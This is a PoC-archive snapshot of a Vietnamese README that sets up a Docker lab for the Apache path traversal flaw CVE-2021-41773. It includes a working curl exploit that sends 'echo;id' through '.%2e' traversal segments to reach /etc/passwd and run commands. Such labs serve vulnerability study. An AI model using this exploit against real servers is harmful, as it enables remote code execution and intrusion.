关联漏洞
介绍
# cve-2021-41773
## Chạy Server
$ docker build -t cve-2021-41773 .
<br>$ docker run --rm -d -p 80:80 cve-2021-41773
## Khai thác
curl --data "echo;id" 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'
## Nguyên nhân
Lỗi cấu hình trong file httpd.conf kết hợp Path traversal => RCE
<br>
文件快照
[4.0K] /data/pocs/7ea9f192c8788510c41335c66eb33ba7a050b0d8
├── [ 78] Dockerfile
├── [ 20K] httpd.conf
└── [ 423] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。